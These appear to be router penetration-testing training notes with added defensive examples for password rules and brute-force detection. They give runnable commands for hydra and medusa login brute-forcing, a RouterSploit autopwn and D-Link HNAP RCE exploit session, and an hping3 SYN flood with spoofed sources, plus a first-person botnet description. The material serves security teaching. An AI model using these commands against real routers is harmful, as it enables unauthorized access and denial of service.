- Router Pentesting
- -----------------
- VAPT - Vulnerability Assessment And Penetration Testing
- We also do the same for routers and smart networking devices: routers, switches, etc.
- 1. Should have a strong password minimum of 16 characters
- 2. Password should be alphanumeric, case sensitive and contain special characters
- 3. Password should never be a single word or name like "LuciferMorningStar"; it should always be a phrase like "SplinterItIntoThousandsPiecesAndScatterItIntoTheWind"
- 4. Never keep the password like "LoveYouBaby", "IHateYou", "Password", "123456789a"
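An added example (not from the original notes) that checks a candidate password against the four rules above and reports which ones it breaks. The blocklist is constructed from the notes' own bad examples, and the "phrase" test is an assumption: at least four CamelCase or separator-delimited words.

```python
import re
import string

# Constructed from the notes' bad examples; a real deployment would check a
# breached-password list (e.g. rockyou.txt) instead of four hard-coded strings.
BLOCKLIST = {"loveyoubaby", "ihateyou", "password", "123456789a"}

MIN_LENGTH = 16   # rule 1
MIN_WORDS = 4     # rule 3 (assumption: a "phrase" has at least four words)


def split_words(pw):
    """Split on CamelCase boundaries and on non-alphanumeric separators."""
    spaced = re.sub(r"(?<=[a-z0-9])(?=[A-Z])", " ", pw)
    return [w for w in re.split(r"[^A-Za-z0-9]+", spaced) if w]


def check_password(pw):
    """Return the names of the rules the password violates; [] means it passes."""
    failures = []
    if len(pw) < MIN_LENGTH:
        failures.append("rule1_length")
    # rule 2: lower, upper, digit and special character must all be present
    classes = [any(c.islower() for c in pw), any(c.isupper() for c in pw),
               any(c.isdigit() for c in pw),
               any(c in string.punctuation for c in pw)]
    if not all(classes):
        failures.append("rule2_charset")
    if len(split_words(pw)) < MIN_WORDS:
        failures.append("rule3_single_word")
    if pw.lower() in BLOCKLIST:
        failures.append("rule4_blocklist")
    return failures
```

Note that the notes' own "good" phrase still trips rule 2 because it has no digit or special character; a separator such as "-" plus a number fixes that.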
- There are many scenarios which we need to consider while pentesting a router.
- 1. Dumbest people ---> Those who never change their router's default username and password, or never set a router password at all.
- http://routerpasswords.com/
- http://192-168-1-1ip.mobi/default-router-passwords-list/
- 2. Slightly smarter people --> In this scenario, people change the default password but keep the default username.
- 3. Smarter people ---> They change both the username and the password of the router.
- ---> Hydra ---> Demo
- ---> Medusa --> Task for you to do...
- When the username is default but the password was changed by the user
- --------------------------------------------------------------
- hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- hydra --> a brute-forcing tool used to crack logins of network services ----> ftp, ssh, telnet, http, etc.
- -s ---> port number
- 80 ---> HTTP protocol port number
- -l ---> single username
- admin --> default username
- -P --> password dictionary (wordlist)
- /usr/share/wordlists/rockyou.txt ---> dictionary in which my password is stored
- 192.168.0.1 ---> default gateway ---> IP address of the router
- http-get ----> service module, i.e. the protocol through which the credentials are transmitted
- Where the smarter people changed both the username and the password
- -------------------------------------------------------------
- hydra -s 80 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get
- To resume a hydra session I can type "hydra -R"
- Medusa ---> Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items to be some of the key features of this application:
- cvs imap nntp postgres rlogin smtp ssh vmauthd wrapper
- ftp mssql pcanywhere rdp rsh smtp-vrfy svn vnc
- http mysql pop3 rexec smbnt snmp telnet web-form
- medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
- 4. Where people are smartest, they hide the router's identifying information (vendor banner, model) on the login page.... You will only get a bare prompt that reads: Username :________
- Password :________
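The other side of the hydra/medusa scenarios above: an added example (not part of the original notes) that spots a dictionary attack against a router's web login from its access log. The log lines are constructed in Common Log Format and are not output from any real device; the detection rule is an assumption: ten or more 401 responses from one source IP inside a 60-second window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one host sends a burst of HTTP Basic Auth guesses
# (401 after 401 against "/"), while another host logs in normally and mistypes once.
SAMPLE_LOG = [
    f'192.168.0.50 - - [10/Oct/2023:13:55:{s:02d} +0000] "GET / HTTP/1.1" 401 0'
    for s in range(12)
] + [
    '192.168.0.20 - admin [10/Oct/2023:13:55:03 +0000] "GET / HTTP/1.1" 200 1024',
    '192.168.0.20 - - [10/Oct/2023:13:56:40 +0000] "GET / HTTP/1.1" 401 0',
]


def parse_line(line):
    """Return (source_ip, timestamp, status) or None for lines that do not match CLF."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), int(m["status"])


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: total_401s} for sources with >= threshold 401s in any sliding window."""
    failures = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[2] == 401:
            failures[parsed[0]].append(parsed[1])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window's left edge
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged
```

Rate-limiting or locking the admin login after a handful of failures is the usual mitigation; this check just tells you when that limit is missing.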
- Routersploit-Framework
- ----------------------
- The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
- It consists of various modules that aid penetration testing operations:
- exploits - modules that take advantage of identified vulnerabilities
- creds - modules designed to test credentials against network services
- scanners - modules that check if a target is vulnerable to any exploit
- Download It From
- https://github.com/reverse-shell/routersploit
- Open the terminal, type
- # git clone https://github.com/reverse-shell/routersploit.git
- # cd routersploit
- # pip install -r requirements.txt
- # ./rsf.py
- [RouterSploit ASCII-art banner] IoT Exploitation Framework
- Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
- Codename : Bad Blood
- Version : 2.2.1
- Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10
- rsf >
- rsf > use scanners/autopwn
- rsf (AutoPwn) > show options
- rsf (AutoPwn) > set target 192.168.0.1
- rsf (AutoPwn) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target 192.168.0.1 Target IP address e.g. 192.168.1.1
- port 80 Target port
- Module options:
- Name Current settings Description
- ---- ---------------- -----------
- threads 8 Number of threads
- rsf (AutoPwn) > run
- rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
- rsf (D-Link Multi HNAP RCE) >
- rsf (D-Link Multi HNAP RCE) > show options
- Target options:
- Name Current settings Description
- ---- ---------------- -----------
- target Target address e.g. http://192.168.1.1
- port 80 Target Port
- rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
- [+] {'target': 'http://192.168.0.1'}
- rsf (D-Link Multi HNAP RCE) > show options
- rsf (D-Link Multi HNAP RCE) > run
- BOTNETS
- -------
- roBOT + NETwork = BOTNET
- I will spread my trojan (malicious software) so that I can control the infected person's machine via my laptop.
- DoS --> Denial of Service
- When an attacker sends a huge amount of data packets to the target, which slows down or exhausts the system.
- hping3
- ------
- hping3 is a network tool able to send custom TCP/IP packets and to display target replies like the ping program does with ICMP replies.
- hping3 handles fragmentation, arbitrary packet body and size, and can be used in order to transfer files encapsulated under supported protocols. Using hping3 you are able to perform at least the following:
- - Test firewall rules
- - Advanced port scanning
- - Test network performance using different protocols, packet size, TOS (type of service) and fragmentation.
- - Path MTU discovery
- - Transferring files even through really strict firewall rules.
- - Traceroute-like under different protocols.
- - Firewalk-like usage.
- - Remote OS fingerprinting.
- - TCP/IP stack auditing.
- - A lot of others.
- hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.16.79.141